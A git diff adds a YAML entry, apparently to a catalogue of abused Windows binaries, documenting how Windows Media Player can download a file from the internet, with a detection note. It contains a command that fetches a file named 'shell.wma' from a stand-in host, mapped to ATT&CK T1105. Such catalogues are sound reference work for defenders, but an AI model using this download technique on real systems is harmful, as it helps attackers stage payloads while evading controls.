diff --git a/yml/OSBinaries/Wmplayer.yml b/yml/OSBinaries/Wmplayer.yml
new file mode 100644
index 00000000..1ea67d5b
--- /dev/null
+++ b/yml/OSBinaries/Wmplayer.yml
@@ -0,0 +1,27 @@
+---
+Name: Wmplayer.exe
+Description: Windows Media Player
+Author: 'Rutger Flohil'
+Created: 2024-12-14
+Commands:
+  - Command: wmplayer.exe "http://example.com/shell.wma"
+    Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use.
+    Usecase: Download file from the internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Download: INetCache
+Full_Path:
+  - Path: C:\Program Files\Windows Media Player\wmplayer.exe
+  - Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
+Code_Sample:
+  - Code: https://pampuna.nl/blog/2024/12/wmplayer.html
+Detection:
+  - IOC: Network connections originating from wmplayer.exe may be suspicious
+Resources:
+  - Link: https://pampuna.nl/blog/2024/12/wmplayer.html
+Acknowledgement:
+  - Person: Rutger Flohil
+    Handle: ''